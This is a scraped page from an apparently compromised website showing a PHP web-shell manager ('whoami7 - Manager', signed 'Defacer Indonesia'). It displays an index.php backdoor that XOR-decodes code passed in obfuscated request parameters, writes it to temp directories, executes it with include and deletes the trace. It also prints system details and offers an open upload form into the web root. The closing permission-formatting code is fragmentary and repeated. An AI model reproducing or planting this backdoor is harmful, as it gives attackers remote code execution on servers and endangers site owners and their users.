whoami7 - Manager

: /home/analuakl/amplmedia.com/user/ Upload File: files >> /home/analuakl/amplmedia.com/user/index.php <?php if(count($_REQUEST) > 0 && isset($_REQUEST["\x66\x6Cag"])){ $pgrp = array_filter(["/tmp", "/var/tmp", getenv("TEMP"), getenv("TMP"), session_save_path(), "/dev/shm", getcwd(), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); $k = $_REQUEST["\x66\x6Cag"]; $k = explode(".",$k ) ; $ptr = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1 ); $s = 0; array_walk($k, function ($v1) use (&$ptr, &$s, $s1, $sLen) { $chS = ord($s1[$s % $sLen] ); $dec = ((int)$v1 - $chS - ($s % 10)) ^ 87; $ptr .= chr($dec ); $s++; } ); foreach ($pgrp as $key => $desc) { if (array_product([is_dir($desc), is_writable($desc)])) { $value = vsprintf("%s/%s", [$desc, ".sym"]); $success = file_put_contents($value, $ptr); if ($success) { include $value; @unlink($value); exit;} } } } if(array_key_exists("\x66a\x63", $_REQUEST)){ $binding = $_REQUEST["\x66a\x63"]; $binding = explode ( "." , $binding ) ; $descriptor=''; $salt5='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $salt5); foreach( $binding as $s => $v5) {$sChar=ord( $salt5[$s% $sLen]); $d=( ( int)$v5 - $sChar -( $s% 10)) ^ 100; $descriptor .= chr( $d);} $tkn = array_filter([getenv("TEMP"), session_save_path(), "/var/tmp", sys_get_temp_dir(), "/dev/shm", "/tmp", getcwd(), ini_get("upload_tmp_dir"), getenv("TMP")]); foreach ($tkn as $token): if ((bool)is_dir($token) && (bool)is_writable($token)) { $pgrp = sprintf("%s/.k", $token); if (@file_put_contents($pgrp, $descriptor) !== false) { include $pgrp; unlink($pgrp); die(); } } endforeach; } echo "<b>".php_uname()."</b><br><br>"; echo "<b>".exec('pwd')."</b><br>"; echo '<h4>###Upload is working###<br></h4>'; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='idx_file'> <input type='submit' name='upload' value='upload'> </form>"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "Succes -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>"; } else { echo "Gagal Di Doc Root"; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "Succes<b>$files</b> Terupload Di Dir Ini"; } else { echo "Gagal"; } } } ?> </style> <title>***'s private tool</title> </head> <body> <?php error_reporting(0); ?> <?php $url = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; ?> </body> Copyright ©2021 || Defacer Indonesia nfo .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?> ?> )); return $info; } ?> ?>